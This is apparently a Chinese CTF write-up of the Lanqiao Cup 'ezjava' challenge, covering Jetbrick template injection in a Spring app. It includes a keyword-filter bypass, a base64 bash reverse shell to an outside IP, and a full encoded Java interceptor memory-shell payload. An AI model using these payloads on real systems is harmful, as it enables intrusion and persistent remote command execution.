第十五届蓝桥杯 网络安全赛道 ezjava
1.前言
前一秒还在robots.txt找flag,下一秒就java内存马了,还不出网,这很🏀 👍, 又坐大牢了。
ezjava在比赛时实现了rce了,但可恨的是题目没回显,不出网,没有静态目录,也不能设cookie和header头,看样子最后只能打内存马了,但本地又没有存内存马,哎。
2.ezjava
拿到jar包先反编译,然后本地动调。
public String render_tmp(@RequestParam String str) {
if (!str.contains("new") && !str.contains("spring") && !str.contains("Class") && !str.contains("UNIXProcess") && !str.contains("ProcessBuilder") && !str.contains("Runtime")) {
JetTemplate template = JetEngine.create().createTemplate(str);
StringWriter out = new StringWriter();
template.render((Map)null, out);
System.out.println(out.toString());
return "RCE";
} else {
return "NO RCE";
}
}
}
是一个模板注入/表达式注入的题目,可以看到过滤了一些命令执行相关函数,然后没有回显。
先解决第一个问题,如何绕过waf
- 我的思路是让其进行二次解析,因为
createTemplate函数传的是个str,就可以利用+绕过关键字了。 - 初步payload (根据给的文档和本地动调还是能调出来这个payload的)
str=a=${jetbrick.template.JetEngine::create().createTemplate("").render({},java.lang.System::out)};
- 如果可以出网的话直接命令执行反弹shell就完事了
str=a=${jetbrick.template.JetEngine::create().createTemplate("${java.lang.Run"%2b"time::getRu"%2b"ntime().exec('bash-c {echo,L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvNDMuMTQyLjE1LjEwLzU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}')}").render({},java.lang.System::out)};
第二个问题,怎么回显。参数里没带response,自然也就没办法设置response了。无脑回字符串也是无解
public String render_tmp(@RequestParam String str) {}
最终估计是要打个内存马的。
spring带有spel表达式,我们利用模板引入spel解析器,然后打内存马,(感觉有点多此一举,他这个模板引擎本身应该就能实现,不过这个有现成的payload,不用白不用)
构造payload时间花的不多,但各种引号转义真让人头疼。
最终payload
str=a=${jetbrick.template.JetEngine::create().createTemplate("${ne"%2b"w+org.spr"%2b"ingframework.expression.spel.standard.SpelExpressionParser().parseExpression('T(org.spr'%2b'ingframework.cglib.core.ReflectUtils).defineCla'%2b'ss(\\'InceptorMemShell\\',T(org.spr'%2b'ingframework.util.Base64Utils).decodeFromString(\\'yv66vgAAADQBAAoAOwCKCABWCwCLAIwIAI0LAI4AjwsAjgCQCACRCACSCgCTAJQKAA4AlQgAlgoADgCXBwCYBwCZCACaCACbCgANAJwIAJ0IAJ4HAJ8KAA0AoAoAoQCiCgAUAKMIAKQKABQApQoAFACmCgAUAKcKABQAqAoAqQCqCgCpAKsKAKkAqAcArAoAIACtCwA8AK4LADwArwkAkwCwCACxCgCyAKoKALMAtAgAtQsAtgC3BwC4BwC5CwAqALoHALsIALwKAL0AvgcAvwoAMACtCgDAAMEKAMAAwgcAwwcAxAoANQCtBwDFCgA3AIoLADQAxggAxwcAyAcAyQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQASTEluY2VwdG9yTWVtU2hlbGw7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEAB2J1aWxkZXIBABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEAC3ByaW50V3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQABbwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQADY21kAQANU3RhY2tNYXBUYWJsZQcAxQcAygcAywcAzAcAmQcAzQcAmAcAnwcArAEACkV4Y2VwdGlvbnMBAApwb3N0SGFuZGxlAQCSKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9Nb2RlbEFuZFZpZXc7KVYBAAxtb2RlbEFuZFZpZXcBAC5Mb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9Nb2RlbEFuZFZpZXc7AQAPYWZ0ZXJDb21wbGV0aW9uAQB5KExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL0V4Y2VwdGlvbjspVgEAAmV4AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcAzgEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAVbWFwcGluZ0hhbmRsZXJNYXBwaW5nAQBUTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmc7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQARYWRhcHRJbnRlcmNlcHRvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAPZXZpbEludGVyY2VwdG9yAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEARkxqYXZhL3V0aWwvTGlzdDxMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3I7PjsHALgHALkHAM8HAL8HAMMHAMQBAApTb3VyY2VGaWxlAQAVSW5jZXB0b3JNZW1TaGVsbC5qYXZhDAA9AD4HAMoMANAA0QEAA2diawcAywwA0gDTDADUANUBAAABAAdvcy5uYW1lBwDWDADXANEMANgA2QEAA3dpbgwA2gDbAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAB2NtZC5leGUBAAIvYwwAPQDcAQAJL2Jpbi9iYXNoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwA3QDeBwDfDADgAOEMAD0A4gEADXdvY2Fvc2luaWRlbWEMAOMA5AwA5QDmDADnANkMAOgAPgcAzQwA6QDTDADqAD4BABNqYXZhL2xhbmcvRXhjZXB0aW9uDADrAD4MAGIAYwwAZgBnDADsAO0BAAZzdGFhcnQHAO4HAO8MAPAA8QEAOW9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLnNlcnZsZXQuRGlzcGF0Y2hlclNlcnZsZXQuQ09OVEVYVAcA8gwA8wD0AQA1b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQBAFJvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nDAD1APYBAD5vcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L2hhbmRsZXIvQWJzdHJhY3RIYW5kbGVyTWFwcGluZwEAE2FkYXB0ZWRJbnRlcmNlcHRvcnMHAPcMAPgA%2bQEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcAzwwA%2bgD7DAD8AP0BAA5qYXZhL3V0aWwvTGlzdAEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uAQAQSW5jZXB0b3JNZW1TaGVsbAwA/gD/AQACb2sBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAyb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3IBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBABBqYXZhL2xhbmcvT2JqZWN0AQATamF2YS9pby9QcmludFdyaXRlcgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABRzZXRDaGFyYWN0ZXJFbmNvZGluZwEAFShMamF2YS9sYW5nL1N0cmluZzspVgEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAqKExqYXZhL2lvL0lucHV0U3RyZWFtO0xqYXZhL2xhbmcvU3RyaW5nOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBAAVjbG9zZQEAB3ByaW50bG4BAAVmbHVzaAEAD3ByaW50U3RhY2tUcmFjZQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BADxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdENvbnRleHRIb2xkZXIBABhjdXJyZW50UmVxdWVzdEF0dHJpYnV0ZXMBAD0oKUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXM7AQA5b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzAQAMZ2V0QXR0cmlidXRlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0kpTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0QmVhbgEAJShMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL09iamVjdDsBAA9qYXZhL2xhbmcvQ2xhc3MBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAA2FkZAEAFShMamF2YS9sYW5nL09iamVjdDspWgAhADcAOwABADwAAAAHAAEAPQA%2bAAEAPwAAAC8AAQABAAAABSq3AAGxAAAAAgBAAAAABgABAAAAEgBBAAAADAABAAAABQBCAEMAAAABAEQARQACAD8AAAIFAAYACQAAAL4rEgK5AAMCADoEGQTGALAsEgS5AAUCACy5AAYBADoFEgc6BxIIuAAJtgAKEgu2AAyZACK7AA1ZBr0ADlkDEg9TWQQSEFNZBRkEU7cAEToGpwAfuwANWQa9AA5ZAxISU1kEEhNTWQUZBFO3ABE6BrsAFFkZBrYAFbYAFhIEtwAXEhi2ABk6CBkItgAamQALGQi2ABunAAUZBzoHGQi2ABwZBRkHtgAdGQW2AB4ZBbYAH6cACjoFGQW2ACEDrASsAAEADwCwALMAIAADAEAAAABOABMAAAAsAAoALQAPAC8AFwAwAB8AMgAjADMAMwA0AFIANgBuADgAhgA5AJoAOgCfADsApgA8AKsAPQCwAEAAswA%2bALUAPwC6AEEAvABDAEEAAABwAAsATwADAEYARwAGAB8AkQBIAEkABQBuAEIARgBHAAYAIwCNAEoASwAHAIYAKgBMAE0ACAC1AAUATgBPAAUAAAC%2bAEIAQwAAAAAAvgBQAFEAAQAAAL4AUgBTAAIAAAC%2bAFQAVQADAAoAtABWAEsABABXAAAAYwAH/wBSAAgHAFgHAFkHAFoHAFsHAFwHAF0ABwBcAAD/ABsACAcAWAcAWQcAWgcAWwcAXAcAXQcAXgcAXAAA/AAnBwBfQQcAXP8AGgAFBwBYBwBZBwBaBwBbBwBcAAEHAGAGAQBhAAAABAABACAAAQBiAGMAAgA/AAAAYAAFAAUAAAAKKissLRkEtwAisQAAAAIAQAAAAAoAAgAAAEgACQBJAEEAAAA0AAUAAAAKAEIAQwAAAAAACgBQAFEAAQAAAAoAUgBTAAIAAAAKAFQAVQADAAAACgBkAGUABABhAAAABAABACAAAQBmAGcAAgA/AAAAYAAFAAUAAAAKKissLRkEtwAjsQAAAAIAQAAAAAoAAgAAAE0ACQBOAEEAAAA0AAUAAAAKAEIAQwAAAAAACgBQAFEAAQAAAAoAUgBTAAIAAAAKAFQAVQADAAAACgBoAE8ABABhAAAABAABACAAAQBpAGoAAgA/AAAAPwAAAAMAAAABsQAAAAIAQAAAAAYAAQAAAFMAQQAAACAAAwAAAAEAQgBDAAAAAAABAGsAbAABAAAAAQBtAG4AAgBhAAAABAABAG8AAQBpAHAAAgA/AAAASQAAAAQAAAABsQAAAAIAQAAAAAYAAQAAAFgAQQAAACoABAAAAAEAQgBDAAAAAAABAGsAbAABAAAAAQBxAHIAAgAAAAEAVABzAAMAYQAAAAQAAQBvAAgAdAA%2bAAEAPwAAAWkAAwAFAAAAarIAJBIltgAmuAAnEigDuQApAwDAACpLKhIruQAsAgDAACtMAU0SLRIutgAvTacACE4ttgAxLAS2ADIBTiwrtgAzwAA0TqcACjoEGQS2ADa7ADdZtwA4OgQtGQS5ADkCAFeyACQSOrYAJrEAAgAlAC0AMAAwADwARQBIADUABABAAAAASgASAAAAFQAIABYAFwAXACMAGAAlABoALQAdADAAGwAxABwANQAeADoAHwA8ACEARQAkAEgAIgBKACMATwAlAFgAJgBhACcAaQAoAEEAAABIAAcAMQAEAE4AdQADAEoABQBOAHYABAAXAFIAdwB4AAAAIwBGAHkAegABACUARAB7AHwAAgA8AC0AfQB%2bAAMAWAARAH8AQwAEAIAAAAAMAAEAPAAtAH0AgQADAFcAAAAtAAT/ADAAAwcAggcAgwcAhAABBwCFBP8AEgAEBwCCBwCDBwCEBwCGAAEHAIcGAAEAiAAAAAIAiQ%3d%3d\\'),T(java.lang.Thread).currentThread().getContextCl'%2b'assLoader()).n'%2b'ewInstance()').getValue()}").render({},java.lang.System::out)};
打了之后,用cmd传代码即可
3.注意
- 需要用 java8来启动jar包,否则payload打不通。
4.总结
- java还不是很熟悉,以后再慢慢学习吧。
